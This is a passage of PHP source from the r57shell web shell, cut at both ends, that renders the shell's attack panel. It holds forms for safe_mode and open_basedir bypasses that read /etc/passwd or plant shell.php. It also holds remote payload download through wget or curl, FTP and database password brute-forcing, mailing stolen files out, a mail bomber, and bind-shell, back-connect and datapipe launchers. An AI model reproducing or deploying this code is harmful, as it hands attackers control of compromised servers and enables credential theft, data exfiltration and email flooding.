                                    echo sr(15, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", in('text', 'test9_file', 96, (!empty($_POST['test9_file']) ? ($_POST['test9_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test9') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.0.0") < 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text121'], 'id24') . $table_up2 . div('id24') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'test10_file', 96, (!empty($_POST['test10_file']) ? ($_POST['test10_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test10') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text122'], 'id19') . $table_up2 . div('id19') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'dir', 96, (!empty($_POST['test18_file']) ? ($_POST['test18_file']) : ($dir))) . in('hidden', 'cmd', 0, 'safe_dir') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text130'], 'id25') . $table_up2 . div('id25') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text116'] . $arrow . "</b>", in('text', 'test11_file', 96, (!empty($_POST['test11_file']) ? ($_POST['test11_file']) : ("/tmp/test.zip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test11') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text123'], 'id26') . $table_up2 . div('id26') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text116'] . $arrow . "</b>", in('text', 'test12_file', 96, (!empty($_POST['test12_file']) ? ($_POST['test12_file']) : ("/tmp/test.bzip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test12') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text124'], 'id27') . $table_up2 . div('id27') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'test13_file2', 96, (!empty($_POST['test13_file2']) ? ($_POST['test13_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test13'));
                                    echo sr(15, "<b>" . $lang[$language . '_text125'] . $arrow . "</b>", in('text', 'test13_file1', 96, (!empty($_POST['test13_file1']) ? ($_POST['test13_file1']) : ("<? phpinfo(); ?>"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text126'], 'id28') . $table_up2 . div('id28') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", in('text', 'test14_file2', 96, (!empty($_POST['test14_file2']) ? ($_POST['test14_file2']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test14'));
                                    echo sr(15, "<b>" . $lang[$language . '_text125'] . $arrow . "</b>", in('text', 'test14_file1', 96, (!empty($_POST['test14_file1']) ? ($_POST['test14_file1']) : ("<? phpinfo(); ?>"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text127'], 'id29') . $table_up2 . div('id29') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'test15_file2', 96, (!empty($_POST['test15_file2']) ? ($_POST['test15_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test15'));
                                    echo sr(15, "<b>" . $lang[$language . '_text125'] . $arrow . "</b>", in('text', 'test15_file1', 96, (!empty($_POST['test15_file1']) ? ($_POST['test15_file1']) : ("<? phpinfo(); ?>"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.4") <= 0) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text129'], 'id16') . $table_up2 . div('id16') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'test16_file', 96, (!empty($_POST['test16_file']) ? ($_POST['test16_file']) : ($dir . "/test.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test16') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $table_up1 . div_title($lang[$language . '_text131'], 'id17') . $table_up2 . div('id17') . $ts;
                                    echo "<tr><td valign=top width=70%>" . $ts;
                                    echo sr(20, "<b>" . $lang[$language . '_text30'] . $arrow . "</b>", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe);
                                    echo $te . "</td><td valign=top width=30%>" . $ts;
                                    echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_2') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe);
                                    echo $te . "</td></tr>";
                                    echo $te . '</div>' . $table_end1;
                                }
                                if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) {
                                    echo $table_up1 . div_title($lang[$language . '_text132'], 'id18') . $table_up2 . div('id18') . $ts;
                                    echo "<tr><td valign=top width=70%>" . $ts;
                                    echo sr(20, "<b>" . $lang[$language . '_text4'] . $arrow . "</b>", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe);
                                    echo $te . "</td><td valign=top width=30%>" . $ts;
                                    echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_3') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe);
                                    echo $te . "</td></tr>";
                                    echo $te . '</div>' . $table_end1;
                                }
                                if ((!@function_exists('ini_get')) || @ini_get('file_uploads')) {
                                    echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
                                    echo $table_up1 . div_title($lang[$language . '_text5'], 'id30') . $table_up2 . div('id30') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile0', 85, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text21'] . $arrow . "</b>", in('checkbox', 'nf1 id=nf1', 0, '1') . in('text', 'new_name', 82, '') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                if ((!@function_exists('ini_get')) || @ini_get('file_uploads')) {
                                    echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
                                    echo $table_up1 . div_title('Multy ' . $lang[$language . '_text5'], 'id34') . $table_up2 . div('id34') . $ts;
                                    echo "<tr><td valign=top width=50%>" . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile1', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile2', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile3', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile4', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile5', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile6', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile7', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile8', 35, ''));
                                    echo $te . "</td><td valign=top width=50%>" . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile9', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile10', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile11', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile12', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile13', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile14', 35, ''));
                                    echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile15', 35, ''));
                                    echo sr(15, '', in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2']));
                                    echo $te . "</td></tr>";
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                $select = '';
                                if ((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('fopen'))) {
                                    $select = "<option value=\"fopen\">fopen</option>";
                                }
                                if (!$safe_mode) {
                                    if (which('wget')) {
                                        $select.= "<option value=\"wget\">wget</option>";
                                    }
                                    if (which('fetch')) {
                                        $select.= "<option value=\"fetch\">fetch</option>";
                                    }
                                    if (which('lynx')) {
                                        $select.= "<option value=\"lynx\">lynx</option>";
                                    }
                                    if (which('links')) {
                                        $select.= "<option value=\"links\">links</option>";
                                    }
                                    if (which('curl')) {
                                        $select.= "<option value=\"curl\">curl</option>";
                                    }
                                    if (which('GET')) {
                                        $select.= "<option value=\"GET\">GET</option>";
                                    }
                                }
                                if ($select) {
                                    echo $fs . $table_up1 . div_title($lang[$language . '_text15'], 'id31') . $table_up2 . div('id31') . $ts;
                                    echo sr(15, "<b>" . $lang[$language . '_text16'] . $arrow . "</b>", "<select size=\"1\" name=\"with\">" . $select . "</select>" . in('hidden', 'dir', 0, $dir) . ws(2) . "<b>" . $lang[$language . '_text17'] . $arrow . "</b>" . in('text', 'rem_file', 78, 'http://'));
                                    echo sr(15, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 105, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2']));
                                    echo $te . '</div>' . $table_end1 . $fe;
                                }
                                echo $fs . $table_up1 . div_title($lang[$language . '_text86'], 'id32') . $table_up2 . div('id32') . $ts;
                                echo sr(15, "<b>" . $lang[$language . '_text59'] . $arrow . "</b>", in('text', 'd_name', 85, $dir) . in('hidden', 'cmd', 0, 'download_file') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt14']));
                                $arh = $lang[$language . '_text92'];
                                if (@function_exists('gzcompress')) {
                                    $arh.= in('radio', 'compress', 0, 'zip') . ' zip';
                                }
                                if (@function_exists('gzencode')) {
                                    $arh.= in('radio', 'compress', 0, 'gzip') . ' gzip';
                                }
                                if (@function_exists('bzcompress')) {
                                    $arh.= in('radio', 'compress', 0, 'bzip') . ' bzip';
                                }
                                echo sr(15, "<b>" . $lang[$language . '_text91'] . $arrow . "</b>", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh);
                                echo $te . '</div>' . $table_end1 . $fe;
                                if (@function_exists("ftp_connect")) {
                                    echo $table_up1 . div_title($lang[$language . '_text93'], 'id33') . $table_up2 . div('id33') . $ts . "<tr>" . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text94'] . "</div></b></font>";
                                    echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("127.0.0.1:21"))) . in('hidden', 'cmd', 0, 'ftp_brute') . in('hidden', 'dir', 0, $dir));
                                    echo sr(25, "", in('radio', 'brute_method', 0, 'passwd', 1) . "<font face=Verdana size=-2>" . $lang[$language . '_text99'] . " ( <a href=" . $_SERVER['PHP_SELF'] . "?users>" . $lang[$language . '_text95'] . "</a> )</font>");
                                    echo sr(25, "", in('checkbox', 'reverse id=reverse', 0, '1', 1) . $lang[$language . '_text101']);
                                    echo sr(25, "", in('radio', 'brute_method', 0, 'dic', 0) . $lang[$language . '_text135']);
                                    echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 0, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("root"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text135'] . $arrow . "</b>", in('text', 'dictionary', 0, (!empty($_POST['dictionary']) ? ($_POST['dictionary']) : ($dir . '/passw.dic'))));
                                    echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt1']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text87'] . "</div></b></font>";
                                    echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("127.0.0.1:21"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 20, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("anonymous"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'ftp_password', 20, (!empty($_POST['ftp_password']) ? ($_POST['ftp_password']) : ("billy@microsoft.com"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text89'] . $arrow . "</b>", in('text', 'ftp_file', 20, (!empty($_POST['ftp_file']) ? ($_POST['ftp_file']) : ("/ftp-dir/file"))) . in('hidden', 'cmd', 0, 'ftp_file_down'));
                                    echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 20, $dir));
                                    echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir));
                                    echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt14']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text100'] . "</div></b></font>";
                                    echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 20, (!empty($_POST['ftp_server_port']) ? ($_POST['ftp_server_port']) : ("127.0.0.1:21"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 20, (!empty($_POST['ftp_login']) ? ($_POST['ftp_login']) : ("anonymous"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'ftp_password', 20, (!empty($_POST['ftp_password']) ? ($_POST['ftp_password']) : ("billy@microsoft.com"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 20, $dir));
                                    echo sr(25, "<b>" . $lang[$language . '_text89'] . $arrow . "</b>", in('text', 'ftp_file', 20, (!empty($_POST['ftp_file']) ? ($_POST['ftp_file']) : ("/ftp-dir/file"))) . in('hidden', 'cmd', 0, 'ftp_file_up'));
                                    echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir));
                                    echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt2']));
                                    echo $te . "</td>" . $fe . "</tr></div></table>";
                                }
                                if (@function_exists("mail")) {
                                    echo $table_up1 . div_title($lang[$language . '_text102'], 'id35') . $table_up2 . div('id35') . $ts . "<tr>" . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text103'] . "</div></b></font>";
                                    echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail') . in('hidden', 'dir', 0, $dir));
                                    echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=22 rows=2>' . (!empty($_POST['text']) ? ($_POST['text']) : ("mail text here")) . '</textarea>');
                                    echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text104'] . "</div></b></font>";
                                    echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir));
                                    echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("file from r57shell"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 30, $dir));
                                    echo sr(25, "<b>" . $lang[$language . '_text91'] . $arrow . "</b>", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh);
                                    echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text139'] . "</div></b></font>";
                                    echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_bomber') . in('hidden', 'dir', 0, $dir));
                                    echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=22 rows=1>' . (!empty($_POST['text']) ? ($_POST['text']) : ("flood text here")) . '</textarea>');
                                    echo sr(25, "<b>Flood" . $arrow . "</b>", in('int', 'mail_flood', 5, (!empty($_POST['mail_flood']) ? ($_POST['mail_flood']) : 100)) . ws(4) . "<b>Size(kb)" . $arrow . "</b>" . in('int', 'mail_size', 5, (!empty($_POST['mail_size']) ? ($_POST['mail_size']) : 10)));
                                    echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
                                    echo $te . "</td>" . $fe . "</tr></div></table>";
                                }
                                if ($mysql_on || $mssql_on || $pg_on || $ora_on) {
                                    $select = '<select name=db>';
                                    if ($mysql_on) $select.= '<option>MySQL</option>';
                                    if ($mssql_on) $select.= '<option>MSSQL</option>';
                                    if ($pg_on) $select.= '<option>PostgreSQL</option>';
                                    if ($ora_on) $select.= '<option>Oracle</option>';
                                    $select.= '</select>';
                                    echo $table_up1 . div_title($lang[$language . '_text82'], 'id36') . $table_up2 . div('id36') . $ts . "<tr>" . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text134'] . "</div></b></font>";
                                    echo sr(35, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", $select . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_brute'));
                                    echo sr(35, "<b>" . $lang[$language . '_text111'] . $arrow . "</b>", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' <b>:</b> ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
                                    echo sr(35, "<b>" . $lang[$language . '_text39'] . $arrow . "</b>", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))));
                                    echo sr(25, "", in('radio', 'brute_method', 0, 'passwd', 1) . "<font face=Verdana size=-2>" . $lang[$language . '_text99'] . " ( <a href=" . $_SERVER['PHP_SELF'] . "?users>" . $lang[$language . '_text95'] . "</a> )</font>");
                                    echo sr(25, "", in('checkbox', 'reverse id=reverse', 0, '1', 1) . $lang[$language . '_text101']);
                                    echo sr(25, "", in('radio', 'brute_method', 0, 'dic', 0) . $lang[$language . '_text135']);
                                    echo sr(35, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))));
                                    echo sr(25, "<b>" . $lang[$language . '_text135'] . $arrow . "</b>", in('text', 'dictionary', 0, (!empty($_POST['dictionary']) ? ($_POST['dictionary']) : ($dir . '/passw.dic'))));
                                    echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt1']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text83'] . "</div></b></font>";
                                    echo sr(35, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", $select);
                                    echo sr(35, "<b>" . $lang[$language . '_text111'] . $arrow . "</b>", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' <b>:</b> ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
                                    echo sr(35, "<b>" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' <b>:</b> ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password"))));
                                    echo sr(35, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))) . ' <b>.</b> ' . in('text', 'mysql_tbl', 8, (!empty($_POST['mysql_tbl']) ? ($_POST['mysql_tbl']) : ("user"))));
                                    echo sr(35, in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'mysql_dump') . "<b>" . $lang[$language . '_text41'] . $arrow . "</b>", in('checkbox', 'dif id=dif', 0, '1') . in('text', 'dif_name', 17, (!empty($_POST['dif_name']) ? ($_POST['dif_name']) : ("dump.sql"))));
                                    echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt9']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text83'] . "</div></b></font>";
                                    echo sr(35, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", $select);
                                    echo sr(35, "<b>" . $lang[$language . '_text111'] . $arrow . "</b>", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' <b>:</b> ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
                                    echo sr(35, "<b>" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' <b>:</b> ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password"))));
                                    echo sr(35, "<b>" . $lang[$language . '_text39'] . $arrow . "</b>", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))));
                                    echo sr(35, "<b>" . $lang[$language . '_text84'] . $arrow . "</b>" . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_query'), "");
                                    echo $te . "<div align=center id='n'><textarea cols=30 rows=4 name=db_query>" . (!empty($_POST['db_query']) ? ($_POST['db_query']) : ("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();")) . "</textarea><br>" . in('submit', 'submit', 0, $lang[$language . '_butt1']) . "</div>";
                                    echo "</td>" . $fe . "</tr></div></table>";
                                }
                                if (!$safe_mode && $unix) {
                                    echo $table_up1 . div_title($lang[$language . '_text81'], 'id37') . $table_up2 . div('id37') . $ts . "<tr>" . $fs . "<td valign=top width=25%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text9'] . "</div></b></font>";
                                    echo sr(40, "<b>" . $lang[$language . '_text10'] . $arrow . "</b>", in('text', 'port', 10, '11457'));
                                    echo sr(40, "<b>" . $lang[$language . '_text11'] . $arrow . "</b>", in('text', 'bind_pass', 10, 'r57'));
                                    echo sr(40, "<b>" . $lang[$language . '_text20'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>" . in('hidden', 'dir', 0, $dir));
                                    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt3']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=25%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text12'] . "</div></b></font>";
                                    echo sr(40, "<b>" . $lang[$language . '_text13'] . $arrow . "</b>", in('text', 'ip', 15, ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
                                    echo sr(40, "<b>" . $lang[$language . '_text14'] . $arrow . "</b>", in('text', 'port', 15, '11457'));
                                    echo sr(40, "<b>" . $lang[$language . '_text20'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>" . in('hidden', 'dir', 0, $dir));
                                    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt4']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=25%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text22'] . "</div></b></font>";
                                    echo sr(40, "<b>" . $lang[$language . '_text23'] . $arrow . "</b>", in('text', 'local_port', 10, '11457'));
                                    echo sr(40, "<b>" . $lang[$language . '_text24'] . $arrow . "</b>", in('text', 'remote_host', 10, 'irc.dalnet.ru'));
                                    echo sr(40, "<b>" . $lang[$language . '_text25'] . $arrow . "</b>", in('text', 'remote_port', 10, '6667'));
                                    echo sr(40, "<b>" . $lang[$language . '_text26'] . $arrow . "</b>", "<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>" . in('hidden', 'dir', 0, $dir));
                                    echo sr(40, "", in('submit', 'submit', 0, $lang[$language . '_butt5']));
                                    echo $te . "</td>" . $fe . $fs . "<td valign=top width=25%>" . $ts;
                                    echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
